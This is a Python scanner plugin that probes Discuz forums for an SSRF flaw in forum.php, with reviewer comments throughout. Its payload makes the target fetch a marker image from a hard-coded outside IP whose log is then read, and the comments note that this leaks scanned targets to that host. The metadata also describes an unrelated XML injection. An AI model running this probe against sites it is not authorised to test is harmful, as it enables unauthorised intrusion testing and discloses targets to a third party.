discuz_SSRF.py
# coding=utf-8
import time
import hashlib
import datetime
import requests
def get_plugin_info():
    """Return the metadata record that describes this scanner plugin.

    The record is a plain dict with the keys ``name``, ``info``, ``level``,
    ``type``, ``author``, ``url``, ``keyword`` and ``source``.

    NOTE(review): the ``info`` text also mentions a TRS InfoGate blind XML
    entity injection, but ``check`` in this file only probes forum.php for
    SSRF. The extra wording looks carried over from another plugin; confirm
    before relying on it in reports.
    """
    return {
        # Display fields.
        "name": "Discuz SSRF漏洞",
        "info": "Discuz论坛forum.php参数message SSRF漏洞,trs infogate插件 blind XML实体注入",
        "level": "中危",
        "type": "SSRF",
        # Provenance of the check.
        "author": "muYoz@bg",
        "url": "https://github.com/Lucifer1993/AngelSword/blob/master/cms/discuz/discuz_forum_message_ssrf.py",
        # Presumably how the framework selects targets for this plugin; confirm against the loader.
        "keyword": "tag:php",
        "source": 1,
    }
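def check(ip, port, timeout=10):
    """Check a Discuz forum for the forum.php ``message`` SSRF with an out-of-band marker.

    The target is asked to fetch a remote image whose file name is a
    one-time marker. The callback listener's log is then read, and the
    target is reported only if the marker appears in it.

    Args:
        ip: Target host, with or without a URL scheme.
        port: Target port (int or str).
        timeout: Timeout in seconds applied to both HTTP requests.

    Returns:
        The finding message when the marker shows up in the listener log,
        otherwise ``None`` (also when a request fails).
    """
    import uuid  # local import: only this function needs it

    # requests rejects URLs without a scheme, so a bare host is given one.
    # str(port) keeps an integer port from raising TypeError.
    base = str(ip)
    if "://" not in base:
        base = "http://" + base
    url = base + ':' + str(port)

    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
    }

    # A random per-call marker. The previous MD5 of a whole-second timestamp
    # was identical for every target checked within the same second, so one
    # hit in the shared log could be attributed to several targets.
    marker = uuid.uuid4().hex

    # NOTE(review): the callback listener and its log live on a hard-coded
    # host that this file does not show to be operator-controlled. Every scan
    # discloses the target's outbound address and the marker to that host,
    # and the log is read over plain HTTP, so a finding is only as
    # trustworthy as that server and the path to it. Point both URLs at
    # infrastructure you run before relying on the results.
    payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://45.76.158.91:6868/" + marker + ".jpg[/img]&formhash=09cec465"
    eye_url = "http://45.76.158.91/web.log"
    vulnurl = url + payload

    try:
        # verify=False: scan targets commonly present self-signed certificates.
        # The caller's timeout is honoured here instead of a fixed 10 seconds.
        requests.get(vulnurl, headers=headers, timeout=timeout, verify=False)
        # Give the target time to make its outbound fetch before reading the log.
        time.sleep(6)
        listener_log = requests.get(eye_url, timeout=timeout)
    except requests.RequestException:
        # An unreachable target or listener means "no finding". Unlike the
        # former bare except, KeyboardInterrupt and SystemExit still propagate.
        return None

    if marker in listener_log.text:
        return u"存在discuz论坛forum.php参数message SSRF漏洞"
    return None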